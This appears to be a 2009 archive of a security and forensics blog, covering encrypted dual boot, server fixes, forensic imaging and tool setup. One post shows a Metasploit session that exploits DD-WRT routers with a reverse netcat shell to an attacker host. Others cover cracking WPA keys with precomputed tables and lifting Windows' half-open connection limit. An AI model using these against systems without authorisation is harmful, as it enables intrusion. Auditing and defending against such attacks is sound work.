Showing posts from 2009

Dual Boot Windows XP and BackTrack with Encryption

A number of people have asked me how I dual boot Windows XP and BackTrack with both operating systems installed on fully encrypted partitions. The following is a rough guide to setting it up. It may not be the best way of setting up this type of configuration, but it works for my needs. Your experience may vary. My laptop has a 200GB IDE hard drive; please adjust for your spec.

Before starting you may want to wipe the entire hard drive (slow on a 200GB drive, but it leaves no recognisable old data next to the encrypted partitions):

dd if=/dev/urandom of=/dev/hda

The target layout is:

Windows XP encrypted with TrueCrypt 6.3
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted

Install Windows XP first (hda1), leaving enough unpartitioned space on the 200GB drive for the two BackTrack partitions.

Boot off the BackTrack 4 CD and run fdisk /dev/hda: create a /boot partition (hda2) of 200MB and a / partition (hda3) from the remainder of the disk. Then set up the encrypted partition.

modprobe aes-i586
cryptsetup luksFormat /dev/hda3
cryptsetup luksOpen /dev/hda3 root
mkfs.ext3 -j /dev/mapper/root

Note that luksFormat must be pointed at the partition (/dev/hda3), not the whole disk: running it against /dev/hda overwrites the partition table and the Windows install you just finished. The -O extent option is an ext4 feature; a plain ext3 root does not need it.
Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make su…

Dell R900 SQL Server 2005 Fails To Install

As part of a new platform deployment I recently took delivery of a number of servers, one of which was a Dell R900 with 4x 6-core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information, see the SQL Server Books Online.

Microsoft has confirmed that on a computer with multicore processors, if the ratio of logical processors to physical sockets is not a power of 2, SQL Server 2005 setup fails. On the R900 the ratio is 6 (6 cores per socket), which is not a power of 2. SQL Server 2005 Service Pack 2 and higher fixes this; however it is not possible to slipstream a service pack into the SQL Server 2005 install CD/DVD. A quick fix is to add /NUMPROC=1 to the boot options in boot.ini, so that setup sees a single processor and the ratio becomes 1.

Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.

SSD Drives and IT Forensics - Update

In a previous post, The implication of new firmware released for OCZ SSD on computer forensics, I asked a number of questions. The post was also sent to an internal mailing list where I work. A number of responses came back and I thought I'd share them.

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.

2. Does the firmware start clearing sectors when the drive is simply connected to a power supply, or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?

No, the firmware does …

The implication of new firmware released for OCZ SSD on computer forensics

UPDATE - Questions answered

On my daily trawl through various feeds (thanks, Google Reader, for making this so easy) I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the writer from a performance standpoint, the IT forensics voice in my head was saying this could make my job more interesting.

This firmware is designed to keep the speed of the SSD as close as possible to that of a new drive, even after it has been used over a long period of time. The NAND flash in an SSD is organised into pages (typically 4KB) grouped into blocks (typically 512KB). An empty page can be written quickly, but flash cannot be overwritten in place: once a block contains data, even a single page's worth, the whole block must be erased and rewritten before that space can be reused.

This is because a memory cell has to be empty to have data written on it, even if it's only partially filled. The data already co…

Root on HTC Magic


1 Click Android Rooting ...

I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.

Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.

I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.

After extracting the SDK to C:\AndroidSDK\ and the images to C:\AndroidSDK\tools, I booted the phone into fastboot mode: power on the phone with the "Back" arrow held down.
Connect the USB cable, open a command prompt and run the following from your AndroidSDK\tools folder:

fastboot boot recovery-new.img

Your phone will reboot and you will be presented with the Android System Recovery menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes backups of your phones system,boot,recovery,data,…

Slipstream or integrate Office 2007 Service Pack 2 (SP2)

If, like me, you update and deploy software to new workstations on a regular basis, you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing Office from a network share and have already copied the entire contents of the CD to this folder.

Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:

c:\tmp\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates

Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.

Enabling AHCI after installing Windows XP x64

Download the OS pre-install SATA drivers and extract them to a temporary location on the machine (c:\tmp).

Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the driver folder (c:\tmp\), highlight the iastor.inf file, hit Open, then OK

Now you should see a list of controllers; select the ICH9 AHCI driver
You'll get warned that installing the device driver is not recommended; click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When the system boots enter the BIOS, navigate to the SATA Operation option (or equivalent) and set it to AHCI
Verify your sat…

Exploiting the cgi-bin vulnerability in DD-WRT

The Metasploit 3.3 development SVN tree now has an exploit for DD-WRT, the embedded Linux distribution for wireless routers. The module abuses a metacharacter injection vulnerability in the HTTP management server of gateways running DD-WRT; the flaw allows an unauthenticated attacker to execute arbitrary commands as root. In this example we are attacking from the LAN side of a Linksys WRT54GS running DD-WRT v24-SP1 with factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST <router IP>
msf exploit(ddwrt_cgibin_exec) > set LHOST <attacking host IP>
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with enco…

DD-WRT httpd vulnerability

As reported at there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.

Note: The exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As an immediate action please disable remote Web GUI management. But that limitation could easily be overridden by Cross-Site Request Forgery (CSRF), where a malicious website could inject the exploit from inside the browser.

The guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download these files from here until we update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned abo…
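The exploit session above and the advisory's note about CSRF describe the same thing from two sides: a GET to the router's cgi-bin whose path carries shell metacharacters, arriving either from the internet or from a browser on the LAN. As an added example that is not from either post or from the Metasploit module, here is a small detection routine that flags such requests in web-server log lines. The log layout (common log format, as an upstream proxy or IDS would record it; DD-WRT's own httpd does not log this way), the metacharacter set and the sample lines are all assumptions constructed for this example.

```python
"""
Added example, not code from the original posts or from the Metasploit
module: scan log lines for requests to the DD-WRT management interface's
cgi-bin that carry shell metacharacters, the injection the advisory
describes. Assumptions: common-log-format lines, a small metacharacter
set, and constructed sample data.
"""
import re
from urllib.parse import unquote

# Constructed sample lines; the two cgi-bin requests with metacharacters
# are the ones the detection should flag. Note the encoded ';' (%3B).
SAMPLE_LOG = """\
192.168.1.50 - - [21/Jul/2009:10:01:02 +0100] "GET /Info.htm HTTP/1.1" 200 1523
192.168.1.50 - - [21/Jul/2009:10:01:09 +0100] "GET /cgi-bin/;id HTTP/1.1" 200 0
192.168.1.77 - - [21/Jul/2009:10:02:15 +0100] "GET /cgi-bin/%3Breboot HTTP/1.1" 200 0
192.168.1.77 - - [21/Jul/2009:10:02:40 +0100] "GET /cgi-bin/Status_Router.asp HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Characters that terminate or chain a command in a POSIX shell (assumed set).
SHELL_META = re.compile(r'[;|`&\n]|\$\(')


def fully_decode(target, rounds=3):
    """Percent-decode repeatedly so a double-encoded ';' (%253B) is not missed."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_cgibin_injections(log_text):
    """Return (ip, timestamp, decoded target) for each suspicious cgi-bin request.

    A LAN source address is not evidence that the request was benign: a CSRF
    page loaded in a LAN browser produces exactly this traffic.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = fully_decode(m.group('target'))
        if target.startswith('/cgi-bin/') and SHELL_META.search(target):
            hits.append((m.group('ip'), m.group('ts'), target))
    return hits


if __name__ == '__main__':
    for ip, ts, target in find_cgibin_injections(SAMPLE_LOG):
        print(f'{ts} {ip} -> {target!r}')
```

Decoding before matching is the part that matters: a single unquote pass misses double-encoded payloads, and matching on the raw path misses %3B entirely.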

Disable System Beep In VMWare

Is the system beep in VMware hurting your ears when Linux or FreeBSD machines are rebooted?
Add the following line to the .vmx file for that vmware machine.

mks.noBeep = "TRUE"

Forensics and Disk Encryption

The challenges for the computer forensics investigator have increased over the past few years.
Companies are deploying disk and volume based encryption systems, and the traditional method of "pull the plug" then forensically image the hard drive is changing. Before powering down a computer, consider the potential for encryption software to be installed on the computer or as part of the operating system. If present, appropriate forensic methods (live acquisition of the mounted volumes and of memory, where the keys reside) should be used to capture the encrypted data before the computer is powered down.

There are essentially two competing goals:

Gather the "best" evidence available
Allow the system to continue operating in an unhindered manner

With encrypted drives becoming more common in the corporate environment, without the cooperation of the suspect or a master key / password supplied by the IT department the data is essentially unreadable. Under the ACPO guidelines (Good Practice Guide for Computer Based Electronic Evidence v3) there are no guidelines for t…

Backtrack 4 Beta and Nessus 4.0.0

I recently installed Nessus 4.0.0 on a vmware install of BackTrack 4 Beta. Below are the steps I took.

Download the following linux packages from the nessus website.


You will also need to register in order to obtain the activation key.

Before installing we will need to install some missing dependencies

apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant

Install the server.

# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb

Configure the certificate

# /opt/nessus/sbin/nessus-mkcert

Add the admin user

# /opt/nessus/sbin/nessus-adduser

# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'

# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb

# /etc/init.d/nessusd start

And start the client from Menu > Internet > NessusClient, or use the CLI.

Social Engineering Investigations

Below is a general outline for investigating social engineering style attacks. This article is meant for discussion purposes only.

One thing you need to be aware of is that social engineering is not limited to IT systems; it is an issue for the entire organisation.

Social engineering attacks can vary from low tech to high tech.

There are many factors that can lead to a successful social engineering attack.

An attacker would normally first take a look at the company website, as these are usually filled with useful information such as the names, positions and phone numbers of staff.

Organisations need to be aware of just how much information they are giving away on their websites.

It is also common practice in organisations for a user's email address to be the same as their network user name, and the password for email may also be the same as the network logon; this is normally the case where an organisation is using Microsoft Exchange.

Armed with this information an attacker…

EnCase and Tableau Forensic Bay

Came across this issue today and thought I'd share it with you.

I recently installed the latest version of EnCase. The release notes state that hard drives connected to Tableau write blockers are now recognised by EnCase as being write blocked. Since we use a large number of Tableau devices I started testing.

In testing I have found this to be true for the Tableau T35es, T35e, T3u, T4, T14 and T15.

When testing with the T335 (Forensic Drive Bay Controller, firmware 6.22) I found that EnCase is not correctly identifying a drive as being write blocked.

Test Results

Test 1: IDE set to Read Only, SATA1 set to Read Only, SATA2 set to Read Only
EnCase sees all drives as write blocked (correct)

Test 2: IDE set to Read Write, SATA1 set to Read Write, SATA2 set to Read Write
EnCase sees all drives as not write blocked (correct)

Test 3: IDE set to Read Only, SATA1 set to Read Write, SATA2 set to Read Only
EnCase sees all drives as write blocked (wrong: SATA1 is writable)

This can be an issue because if you b…

Install OpenOffice 3.01 in Backtrack 4 Beta

I decided to install OpenOffice in Backtrack since it is not part of the default pack because of size limitations. I always find it useful to have a spreadsheet application installed as part of my Pen-Testing toolkit.
Get the Linux DEB package. I am using the English (US) build.

tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz
cd OOo_inst_folder/DEBS
dpkg -i *.deb

(Not sure this is needed for KDE but I did it for the icons in kmenuedit)
cd desktop-integration
dpkg -i *.deb

Add it to the KDE menu with kmenuedit (if you are using Gnome you don't need to do this):

Click on Utilities
Ctrl+N (New)

Name: OpenOffice3 (or what ever you want)
Command: /opt/openoffice.org3/program/soffice
Click on the blank icon next to name and pick an icon for open office
Ctrl+S (Save)

Increase the number of tcp connections in Windows XP


Half-open limit fix is a program designed to change the maximum number of concurrent half-open outbound TCP connections (connection attempts) in the Windows system file tcpip.sys. Microsoft first introduced this limit in Windows XP SP2 (Service Pack 2) and carried it into Vista (Vista SP2 and Windows 7 later dropped it). This was done to slow the spread of viruses and malware from system to system and to reduce the impact of infected systems participating in DoS (Denial of Service) attacks. The limit means a Windows system cannot have more than 10 concurrent half-open outbound connections; after 10, new connection attempts are queued and forced to wait. Bear in mind that raising it removes that brake on worm propagation and scanning from the machine, and any Windows update that replaces tcpip.sys reinstates the original limit.

FreeNAS - Transmission and Windows Remote Client

I've been playing around with FreeNAS for some time now and have migrated an old Debian server over to FreeNAS in order to make things easier for the non-linux members of our team.

The server hosts all the deployment images for our lab workstations, among other non-sensitive data. The images are deployed via PXE; more on that to follow in another post.

I recently looked at the BitTorrent service, which seems like a good idea. All your torrents are controlled and downloaded to a central location, ideal in a lab environment. Downloading the latest version of Ubuntu or OpenOffice is now as simple as dropping the .torrent file into a shared directory and letting FreeNAS take care of the rest.

The majority of the lab workstations are Windows boxes, so I went to the Transmission website to download the Windows remote client. It was then that I found that Transmission does not have a Windows client.

A few google minutes later I find transmission-remote-dotnet on the google code page. I instal…

VMWare Shared Folders and BackTrack 4 Beta

I finally got around to trying out the latest version of BackTrack 4 Beta. Using VMware Workstation 6.5.1 I enabled "Shared Folders" so I could use some pre-computed tables. However when I browsed to /mnt/hgfs I saw an empty folder.
Trying mount.hgfs .host:/ /mnt/hgfs/ gave the following error: cannot mount filesystem: No such device

To fix this issue follow these steps.

Download and extract the latest tarball of open-vm-tools from sourceforge.

Download and extract the latest glib tarball from because open-vm-tools require it

Install glib
./configure && make && make install

Build and install open-vm-tools (the --without flags skip optional components whose dependencies are not on BackTrack).
./configure --without-dnet --without-x --without-unity --without-icu && make && make install

Reboot and use the following command to mount your VMWare Shared Folder.

mount -t vmhgfs .host:/ /mnt/hgfs/

Add Pre-Computed WPA hashes to airolib

First I obtained the 33GB rainbow table from

Please note that the 33 GB file is compressed using a number of methods so you need a lot of space to decompress the hash files.

When the file (wpa_psk-h1kari_renderman.tar.lzma) has downloaded, extract it; I used 7zip.
Once extracted you are left with wpa_psk-h1kari_renderman.tar

Next step is to decompress the .tar, I used 7zip.
When the extraction is complete you will have 9 folders; these contain the pre-computed hashes.

Now all you have to do is know which ESSID you are looking for. I assume you are auditing your OWN network or have permission to audit your client's network. Remember that WPA-PSK hashes are salted with the ESSID, so the tables only help for the ESSIDs they were generated for; an unusual ESSID will not be in them.


I want to audit a wireless network with WPA encryption with an essid of "Private"

airolib-ng testdb --import cowpatty /mnt/sdb1/wpapsk/xag-0/Private

There will then be some reading and writing to "testdb"

airolib-ng testdb --stats

you should see your essid computed to 100%

Creating Encrypted Forensic Images

Recently we have been asked by some of our clients to encrypt the forensic images we collect before leaving their site. Below are two possible solutions.

Hardware Capture Method

Using a Solo or Talon hardware imager, create a standard dd image of the suspect hard drive.
While the drive is being imaged, use a forensic laptop to create a TrueCrypt volume on a new NTFS-formatted hard drive. Make sure that the TrueCrypt volume is larger than the disk being imaged.

When the solo or talon has finished imaging robocopy the dd image to the mounted TrueCrypt volume.

Verify that the copied image can be opened without errors and that its hash matches the hash the imager recorded at acquisition.
Securely erase the images from the non encrypted drives using your local standard method.
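The copy into the TrueCrypt volume is the only thing standing between you and a wiped working image, so it is worth checking byte for byte rather than just opening it. As an added example that is not from the original post, the routine below streams both files through SHA-256 in fixed-size chunks (images are far too large to read into memory) and compares sizes first so an interrupted copy is reported cheaply. The paths are placeholders and demo() builds a small constructed stand-in image in a temporary directory.

```python
"""
Added example, not code from the original post: confirm that the dd image
copied into the TrueCrypt volume is identical to the source before the
unencrypted copy is wiped. Chunked SHA-256 keeps memory flat on images
of several hundred GB. Paths are placeholders; demo() uses constructed data.
"""
import hashlib
import os
import shutil
import tempfile

CHUNK = 4 * 1024 * 1024  # 4 MiB reads; hashing is sequential I/O either way


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, 'rb') as fh:
        for block in iter(lambda: fh.read(CHUNK), b''):
            digest.update(block)
    return digest.hexdigest()


def verify_copy(src, dst):
    """Return (ok, src_digest, dst_digest).

    Sizes are compared first: a copy that stopped early (volume full,
    cable pulled) is caught without hashing the whole destination.
    """
    if os.path.getsize(src) != os.path.getsize(dst):
        return False, None, None
    src_digest = sha256_file(src)
    dst_digest = sha256_file(dst)
    return src_digest == dst_digest, src_digest, dst_digest


def demo():
    """Constructed run: a 3 MiB pseudo-image, one good copy, one truncated copy.
    Returns (good_copy_ok, truncated_copy_ok)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, 'suspect.dd')
        good = os.path.join(tmp, 'suspect_copy.dd')
        short = os.path.join(tmp, 'suspect_truncated.dd')
        with open(src, 'wb') as fh:
            fh.write(os.urandom(1024 * 1024) * 3)   # constructed image content
        shutil.copyfile(src, good)                  # what robocopy should produce
        with open(src, 'rb') as s, open(short, 'wb') as d:
            d.write(s.read(2 * 1024 * 1024))        # an interrupted copy
        return verify_copy(src, good)[0], verify_copy(src, short)[0]


if __name__ == '__main__':
    print(demo())  # (True, False)
```

Record the source digest in your contemporaneous notes at acquisition time; the same function then lets you re-verify the image inside the TrueCrypt volume at any later point in the case.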

Software Capture Method

Create a TrueCrypt encrypted hard drive formatted as NTFS.
This can be done in advance as it will take some time to format and encrypt a 500GB hard drive

Using FTK, EnCase, DD, etc.

Mount the TrueCrypt encrypted drive.
Connect the suspect drive to a write blocker.
Create a i…

Recover Deleted Outlook Items

With Outlook closed, make a copy of the PST and open the copy in a hex editor.

Overwrite positions 7 through 13 with the spacebar.
Since the editor uses hexadecimal offsets, this actually clears 13 bytes, at the following positions:
00007, 00008, 00009, 0000a, 0000b, 0000c, 0000d, 0000e, 0000f, 00010, 00011, 00012, 00013
As you clear the characters, the editor displays the code “20” in their position.

Save the PST, it is now corrupted.

Run the Inbox Repair Tool, SCANPST.exe, to recover the file.

On Win2K and WinNT systems, the executable is located in
C:\Program Files\Common Files\System\Mapi\1033\NT

You can also find it on the Office 2000 CD-ROM in
\Program Files\Common\System\Mapi\1033\NT.

On Windows XP, the file is located in
C:\Program Files\Common Files\System\Mapi\1033

And Windows XP Office XP/2002 SP2
C:\Program Files\Common Files\System\MSMAPI\1033

The Inbox Repair Tool creates a backup and repairs the damage and recreates the PST.

Open the new PST in Outlook.

The Deleted Items folder should now contain the deleted messages, unles…
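The hex-editor step above is easy to get wrong by one byte, so here is the same edit done programmatically, as an added example that is not from the original post. It overwrites offsets 0x07 through 0x13 (13 bytes) with 0x20 exactly as described, and only ever on a copy, so the original PST stays intact. SAMPLE_HEADER is a constructed stand-in for the first 64 bytes of a PST, not a real file; the "!BDN" signature it starts with is the magic every PST header carries, and the 0x07 to 0x13 range overlaps the last byte of the header's partial CRC, the client magic and the version fields, which is why SCANPST afterwards treats the file as damaged and rebuilds it.

```python
"""
Added example, not code from the original post: apply the hex-editor
step programmatically on a copy of the PST. SAMPLE_HEADER is constructed
test data, not a real PST.
"""
import shutil

BLANK_START = 0x07   # first offset the procedure clears
BLANK_END = 0x13     # last offset, inclusive (13 bytes in total)
BLANK_BYTE = 0x20    # the "20" the hex editor shows once a space is typed
PST_MAGIC = b'!BDN'  # dwMagic at offset 0 of every PST header

# Constructed: the magic followed by counting bytes, so edits are easy to spot.
SAMPLE_HEADER = PST_MAGIC + bytes(range(4, 64))


def blank_pst_header(data):
    """Return a copy of data with bytes 0x07..0x13 replaced by 0x20.

    Refuses input that does not start with the PST magic or is too short
    to contain the range, so the wrong file is never written to.
    """
    if data[:4] != PST_MAGIC:
        raise ValueError('not a PST: missing !BDN magic')
    if len(data) <= BLANK_END:
        raise ValueError('input shorter than the PST header region')
    buf = bytearray(data)
    for offset in range(BLANK_START, BLANK_END + 1):
        buf[offset] = BLANK_BYTE
    return bytes(buf)


def corrupt_pst_copy(src_path, dst_path):
    """Copy src_path to dst_path and blank the header bytes in the copy.

    Point SCANPST.EXE at dst_path afterwards; never at the original.
    """
    shutil.copyfile(src_path, dst_path)
    with open(dst_path, 'r+b') as fh:
        head = fh.read(BLANK_END + 1)
        fh.seek(0)
        fh.write(blank_pst_header(head))
    return dst_path


if __name__ == '__main__':
    before = SAMPLE_HEADER[:24].hex(' ')
    after = blank_pst_header(SAMPLE_HEADER)[:24].hex(' ')
    print('before:', before)
    print('after: ', after)
```

The two guards are the point: SCANPST will happily "repair" whatever file you hand it, so the script checks the magic and the length before touching anything, and the original is never opened for writing.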